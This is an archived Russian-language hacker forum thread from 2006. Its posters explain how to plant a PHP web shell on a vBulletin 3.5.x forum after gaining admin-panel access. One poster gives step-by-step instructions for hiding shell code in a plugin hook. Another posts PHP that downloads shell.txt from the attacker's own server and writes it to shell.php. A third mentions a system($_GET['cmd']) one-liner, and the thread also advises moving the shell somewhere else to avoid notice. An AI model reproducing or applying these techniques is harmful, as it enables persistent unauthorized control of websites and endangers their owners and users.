PDA

Просмотр полной версии : Шелл vBulletin 3.5.3


bandera
17.07.2006, 14:37
В поиске был, так ничего и не нашёл. -)
Имею доступ к админке, можно ли всётаки как нибудь залить шелл?

Enk0r
17.07.2006, 14:42
Наверное никак...

Geniy
17.07.2006, 18:51
Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...

Azazel
17.07.2006, 19:31
Не знаю можно ли это на 3.5.3. Но попробуй пройтись по одной из ссылок внизу топика. ShAnKaR описывал.

bandera
17.07.2006, 20:42
Хватит дезинформировать народ.. Залить можно через модули.. Видео скора сниму...

Можно объяснить по подробней, а то пока видео дождёшься...

Tem
17.07.2006, 21:00
А ты через смайлы пробовал , у меня тожа один раз такая проблемка вышла , я даже сам не поверл когда залил шелл через смайлики.

WEB'er
17.07.2006, 21:17
А нужно именно залить? Там же вроде в шалоны можно Php-код вставлять .... Или нет?=) Заинклудь шелл со своего хоста а там разбирёшься=)

Geniy
17.07.2006, 21:21
Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб,
Адмминка-Система модулей- добавить новый модуль.
Продукт Vbulletin
Месторасположение: Vbulletin: Справка - faq_complete
В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
Затем прост о заходишь в справку из форума и любуешся своим шеллом.

Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :)

WEB'er
17.07.2006, 23:02
Geniy
на 3.5.4 у меня не пашет=(

2 ALL
вот мой немного дебильный способ=)

Заливаем куда-нить с себе на хост шелл под именем - "shell.txt"

Создаём новый модуль. Местоположение хака - "Calendar_start"
Даём ему какое-нить неприметное имя=)
И пишем код:

$file = fopen("http://ВАШ_СЕРВЕР.ru/shell.txt", "r");
$fp = fopen('shell.php', 'a');
while ($line = fgets($file, 4096) )
{
$line.="\n";
fwrite($fp, ''.$line.'');
}
fclose($fp);
fclose($file);


теперь идём по ссылке - _http://servak.com/forum/shell.php - вот он наш шелл.

Проверял всё это дело на локалхосте - работает. Работоспособность будет зависеть от настроек апача, или что там у вас стоит=). Конечно способ идиотский, но у меня на локалхосте больше ничего не срабатывало=( : ни инклудинг, ни "system($id);", ни через смайлы ... ТОлько вот этот способ=)

Brahma
17.07.2006, 23:14
Видимо обычный system($_GET["cmd"]); ужэ не рулёз )

Geniy
17.07.2006, 23:14
Мой способ прекрасно работает на 3.5.4. Видно у тя шелл больше 60 кб.

bandera
17.07.2006, 23:20
Ладно - обойдёмся без видео:
Берешь шелл не больше 60кб,
Адмминка-Система модулей- добавить новый модуль.
Продукт Vbulletin
Месторасположение: Vbulletin: Справка - faq_complete
В тело вставляешь код шелла предварительно убрав в начале <? и в конце ?>
Затем прост о заходишь в справку из форума и любуешся своим шеллом.

Советую сразу перезалить шелл в другое место - а этот удалить - мало-ли кому взбредёт справку глянуть :)
Благадорю.